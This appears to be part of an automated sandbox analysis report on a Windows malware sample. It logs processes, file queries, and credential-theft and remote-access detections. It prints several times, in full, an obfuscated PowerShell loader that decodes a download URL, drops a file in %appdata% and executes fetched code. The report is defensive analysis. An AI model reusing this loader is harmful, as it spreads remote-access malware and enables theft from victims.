o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes';if (${host}.currentculture) {$almengjorde++;}function sprge($kalkunernes){$batterdock=$kalkunernes.length-$almengjorde;$experientialistic='substri';$experientialistic+='ng';for( $ricabooracker=2;$ricabooracker -lt $batterdock;$ricabooracker+=3){$labeler+=$kalkunernes.$experientialistic.invoke( $ricabooracker, $almengjorde);}$labeler;}function dkvingen($smaaborgerligeres){ & ($hektoliters) ($smaaborgerligeres);}$omsorgsfuldere=sprge 'b,mspoinzbaiamlbal.ua,e/gu5mu.he0a .i(,ew ,iblnindaroscwp ssk enn.rtfo 1di0he.d.0rn;sp fiw ailant 6 r4.e;bo adxsu6gi4ad;wi rhranvas:pl1he2tr1mi..r0su)al geg leskcu.k aona/c,2pe0fa1pr0.e0ot1an0om1ag infa,i fr,uelafsuohexb,/ne1 d2 ,1 u. ,0b, ';$theorize=sprge 'biu,is .estran-l a eg,resunyat h ';$archaiser=sprge 'hahfet.ut dp ss c: a/ta/ .dlar riudvpoes,.degruof,o og.ylkae k.foc mo,rmsj/reupacne?ase,oxtep.eo trshter=sedseok.wvinshlkyoulastd,n& bipedk.= m1 ,-f.zty0ral m_f 0e mprgbuutrlsoc cocy-br5 tekoo nls z.kq ltkns lulilsa5 su.rzsng npt.xl psihsi_li ';$pediococci150=sprge 'br>p. ';$hektoliters=sprge 'priheeayxun ';$koksede='amar';$doktordisputatsen = sprge ',aemacruhhao l ,a%b.a.hphep .dk a dtm,are% a\s.ft.oa.laekmiehes nlexaseg ,ecrtd.. .o,up,di,y co&fo&fu m,e cdeht odo unts. ';dkvingen (sprge 've$ ,gnelruofabsrapilce:besett .aspta ic o sn,lcbaaf.r .edunl =s,( bchomefdem de/ nc , b$i,defokeka.turorerdidbrikls ap,aucatp,agatafs .e cnle) z ');dkvingen (sprge ' ,$,egdel.ao ,bina ,lsa: mes n rgdalp eu s rkk a,ir tekos,a=va$jua .r .cflh ,aunisks le nrud. ds ,pfaljuis t .( m$unp .eandb,i o bcpyo.tc scfoi p1sc5 t0 s)ek ');dkvingen (sprge ' y[ nc e ,tpr. iscaepar.rv.ii.ec .eilpkoo oi rnratclm ta.pnacavigsaererch],e:ek: aspaek.c mu .r pienthjy tpgar aointquovic,uo vl =in [ n ee itpr. .shoe bccou trmyi htomy.ipudrskop.t ovac o elartklyopp hepr],i:ud:cotn,lf sno1 v2 k ');$archaiser=$engleskares[0];$merocele= (sprge 'f $angbelspoexb.naomlne:urb ,frul festnre=ukn,le owba-promab.ljute,rcvetfr f.sa.y nsr tpreinm,e.grnboeintb..elwfremybpecepluni be jn tt');$merocele+=$stationcaren[1];dkvingen ($merocele);dkvingen (sprge ',o$nubu.f olsueren ,.k h,me ra,odapenorfos .[ p$stt phdee solir.rituzc e,o]es=fi$ okom ,su.ostrm.gvrsbrf uur,lsmd.heharspe h ');$kundetilfredshedsgarantiernes=sprge ' ,$ abvefdalbieganem.kidt,o fw.nnsul nonua sd .f kida
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes';if (${host}.currentculture) {$almengjorde++;}function sprge($kalkunernes){$batterdock=$kalkunernes.length-$almengjorde;$experientialistic='substri';$experientialistic+='ng';for( $ricabooracker=2;$ricabooracker -lt $batterdock;$ricabooracker+=3){$labeler+=$kalkunernes.$experientialistic.invoke( $ricabooracker, $almengjorde);}$labeler;}function dkvingen($smaaborgerligeres){ & ($hektoliters) ($smaaborgerligeres);}$omsorgsfuldere=sprge 'b,mspoinzbaiamlbal.ua,e/gu5mu.he0a .i(,ew ,iblnindaroscwp ssk enn.rtfo 1di0he.d.0rn;sp fiw ailant 6 r4.e;bo adxsu6gi4ad;wi rhranvas:pl1he2tr1mi..r0su)al geg leskcu.k aona/c,2pe0fa1pr0.e0ot1an0om1ag infa,i fr,uelafsuohexb,/ne1 d2 ,1 u. ,0b, ';$theorize=sprge 'biu,is .estran-l a eg,resunyat h ';$archaiser=sprge 'hahfet.ut dp ss c: a/ta/ .dlar riudvpoes,.degruof,o og.ylkae k.foc mo,rmsj/reupacne?ase,oxtep.eo trshter=sedseok.wvinshlkyoulastd,n& bipedk.= m1 ,-f.zty0ral m_f 0e mprgbuutrlsoc cocy-br5 tekoo nls z.kq ltkns lulilsa5 su.rzsng npt.xl psihsi_li ';$pediococci150=sprge 'br>p. ';$hektoliters=sprge 'priheeayxun ';$koksede='amar';$doktordisputatsen = sprge ',aemacruhhao l ,a%b.a.hphep .dk a dtm,are% a\s.ft.oa.laekmiehes nlexaseg ,ecrtd.. .o,up,di,y co&fo&fu m,e cdeht odo unts. ';dkvingen (sprge 've$ ,gnelruofabsrapilce:besett .aspta ic o sn,lcbaaf.r .edunl =s,( bchomefdem de/ nc , b$i,defokeka.turorerdidbrikls ap,aucatp,agatafs .e cnle) z ');dkvingen (sprge ' ,$,egdel.ao ,bina ,lsa: mes n rgdalp eu s rkk a,ir tekos,a=va$jua .r .cflh ,aunisks le nrud. ds ,pfaljuis t .( m$unp .eandb,i o bcpyo.tc scfoi p1sc5 t0 s)ek ');dkvingen (sprge ' y[ nc e ,tpr. iscaepar.rv.ii.ec .eilpkoo oi rnratclm ta.pnacavigsaererch],e:ek: aspaek.c mu .r pienthjy tpgar aointquovic,uo vl =in [ n ee itpr. .shoe bccou trmyi htomy.ipudrskop.t ovac o elartklyopp hepr],i:ud:cotn,lf sno1 v2 k ');$archaiser=$engleskares[0];$merocele= (sprge 'f $angbelspoexb.naomlne:urb ,frul festnre=ukn,le owba-promab.ljute,rcvetfr f.sa.y nsr tpreinm,e.grnboeintb..elwfremybpecepluni be jn tt');$merocele+=$stationcaren[1];dkvingen ($merocele);dkvingen (sprge ',o$nubu.f olsueren ,.k h,me ra,odapenorfos .[ p$stt phdee solir.rituzc e,o]es=fi$ okom ,su.ostrm.gvrsbrf uur,lsmd.heharspe h ');$kundetilfredshedsgarantiernes=sprge ' ,$ abvefdalbieganem.kidt,o fw.nnsul nonua sd .f kida
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes';if (${host}.currentculture) {$almengjorde++;}function sprge($kalkunernes){$batterdock=$kalkunernes.length-$almengjorde;$experientialistic='substri';$experientialistic+='ng';for( $ricabooracker=2;$ricabooracker -lt $batterdock;$ricabooracker+=3){$labeler+=$kalkunernes.$experientialistic.invoke( $ricabooracker, $almengjorde);}$labeler;}function dkvingen($smaaborgerligeres){ & ($hektoliters) ($smaaborgerligeres);}$omsorgsfuldere=sprge 'b,mspoinzbaiamlbal.ua,e/gu5mu.he0a .i(,ew ,iblnindaroscwp ssk enn.rtfo 1di0he.d.0rn;sp fiw ailant 6 r4.e;bo adxsu6gi4ad;wi rhranvas:pl1he2tr1mi..r0su)al geg leskcu.k aona/c,2pe0fa1pr0.e0ot1an0om1ag infa,i fr,uelafsuohexb,/ne1 d2 ,1 u. ,0b, ';$theorize=sprge 'biu,is .estran-l a eg,resunyat h ';$archaiser=sprge 'hahfet.ut dp ss c: a/ta/ .dlar riudvpoes,.degruof,o og.ylkae k.foc mo,rmsj/reupacne?ase,oxtep.eo trshter=sedseok.wvinshlkyoulastd,n& bipedk.= m1 ,-f.zty0ral m_f 0e mprgbuutrlsoc cocy-br5 tekoo nls z.kq ltkns lulilsa5 su.rzsng npt.xl psihsi_li ';$pediococci150=sprge 'br>p. ';$hektoliters=sprge 'priheeayxun ';$koksede='amar';$doktordisputatsen = sprge ',aemacruhhao l ,a%b.a.hphep .dk a dtm,are% a\s.ft.oa.laekmiehes nlexaseg ,ecrtd.. .o,up,di,y co&fo&fu m,e cdeht odo unts. ';dkvingen (sprge 've$ ,gnelruofabsrapilce:besett .aspta ic o sn,lcbaaf.r .edunl =s,( bchomefdem de/ nc , b$i,defokeka.turorerdidbrikls ap,aucatp,agatafs .e cnle) z ');dkvingen (sprge ' ,$,egdel.ao ,bina ,lsa: mes n rgdalp eu s rkk a,ir tekos,a=va$jua .r .cflh ,aunisks le nrud. ds ,pfaljuis t .( m$unp .eandb,i o bcpyo.tc scfoi p1sc5 t0 s)ek ');dkvingen (sprge ' y[ nc e ,tpr. iscaepar.rv.ii.ec .eilpkoo oi rnratclm ta.pnacavigsaererch],e:ek: aspaek.c mu .r pienthjy tpgar aointquovic,uo vl =in [ n ee itpr. .shoe bccou trmyi htomy.ipudrskop.t ovac o elartklyopp hepr],i:ud:cotn,lf sno1 v2 k ');$archaiser=$engleskares[0];$merocele= (sprge 'f $angbelspoexb.naomlne:urb ,frul festnre=ukn,le owba-promab.ljute,rcvetfr f.sa.y nsr tpreinm,e.grnboeintb..elwfremybpecepluni be jn tt');$merocele+=$stationcaren[1];dkvingen ($merocele);dkvingen (sprge ',o$nubu.f olsueren ,.k h,me ra,odapenorfos .[ p$stt phdee solir.rituzc e,o]es=fi$ okom ,su.ostrm.gvrsbrf uur,lsmd.heharspe h ');$kundetilfredshedsgarantiernes=sprge ' ,$ abvefdalbieganem.kidt,o fw.nnsul nonua sd .f kida Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes labeler esmeralda prepious engleskares archaiser dolphinfishes150 pungi amar sjlesorger shopkeeper nephrostomy mainframes raninae kobberbrylluppet firethorn smlds outslander praedikaterne ublufrdigste sejlklubbers amtsskatteinspektoratet nondecoration235 topminnow interveneredes';if (${host}.currentculture) {$almengjorde++;}function sprge($kalkunernes){$batterdock=$kalkunernes.length-$almengjorde;$experientialistic='substri';$experientialistic+='ng';for( $ricabooracker=2;$ricabooracker -lt $batterdock;$ricabooracker+=3){$labeler+=$kalkunernes.$experientialistic.invoke( $ricabooracker, $almengjorde);}$labeler;}function dkvingen($smaaborgerligeres){ & ($hektoliters) ($smaaborgerligeres);}$omsorgsfuldere=sprge 'b,mspoinzbaiamlbal.ua,e/gu5mu.he0a .i(,ew ,iblnindaroscwp ssk enn.rtfo 1di0he.d.0rn;sp fiw ailant 6 r4.e;bo adxsu6gi4ad;wi rhranvas:pl1he2tr1mi..r0su)al geg leskcu.k aona/c,2pe0fa1pr0.e0ot1an0om1ag infa,i fr,uelafsuohexb,/ne1 d2 ,1 u. ,0b, ';$theorize=sprge 'biu,is .estran-l a eg,resunyat h ';$archaiser=sprge 'hahfet.ut dp ss c: a/ta/ .dlar riudvpoes,.degruof,o og.ylkae k.foc mo,rmsj/reupacne?ase,oxtep.eo trshter=sedseok.wvinshlkyoulastd,n& bipedk.= m1 ,-f.zty0ral m_f 0e mprgbuutrlsoc cocy-br5 tekoo nls z.kq ltkns lulilsa5 su.rzsng npt.xl psihsi_li ';$pediococci150=sprge 'br>p. ';$hektoliters=sprge 'priheeayxun ';$koksede='amar';$doktordisputatsen = sprge ',aemacruhhao l ,a%b.a.hphep .dk a dtm,are% a\s.ft.oa.laekmiehes nlexaseg ,ecrtd.. .o,up,di,y co&fo&fu m,e cdeht odo unts. ';dkvingen (sprge 've$ ,gnelruofabsrapilce:besett .aspta ic o sn,lcbaaf.r .edunl =s,( bchomefdem de/ nc , b$i,defokeka.turorerdidbrikls ap,aucatp,agatafs .e cnle) z ');dkvingen (sprge ' ,$,egdel.ao ,bina ,lsa: mes n rgdalp eu s rkk a,ir tekos,a=va$jua .r .cflh ,aunisks le nrud. ds ,pfaljuis t .( m$unp .eandb,i o bcpyo.tc scfoi p1sc5 t0 s)ek ');dkvingen (sprge ' y[ nc e ,tpr. iscaepar.rv.ii.ec .eilpkoo oi rnratclm ta.pnacavigsaererch],e:ek: aspaek.c mu .r pienthjy tpgar aointquovic,uo vl =in [ n ee itpr. .shoe bccou trmyi htomy.ipudrskop.t ovac o elartklyopp hepr],i:ud:cotn,lf sno1 v2 k ');$archaiser=$engleskares[0];$merocele= (sprge 'f $angbelspoexb.naomlne:urb ,frul festnre=ukn,le owba-promab.ljute,rcvetfr f.sa.y nsr tpreinm,e.grnboeintb..elwfremybpecepluni be jn tt');$merocele+=$stationcaren[1];dkvingen ($merocele);dkvingen (sprge ',o$nubu.f olsueren ,.k h,me ra,odapenorfos .[ p$stt phdee solir.rituzc e,o]es=fi$ okom ,su.ostrm.gvrsbrf uur,lsmd.heharspe h ');$kundetilfredshedsgarantiernes=sprge ' ,$ abvefdalbieganem.kidt,o fw.nnsul nonua sd .f kida Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000D.00000002.3219431727.0000000009FA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D Jump to behavior
Source: Yara match File source: 0000000D.00000002.3219431727.0000000009FA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs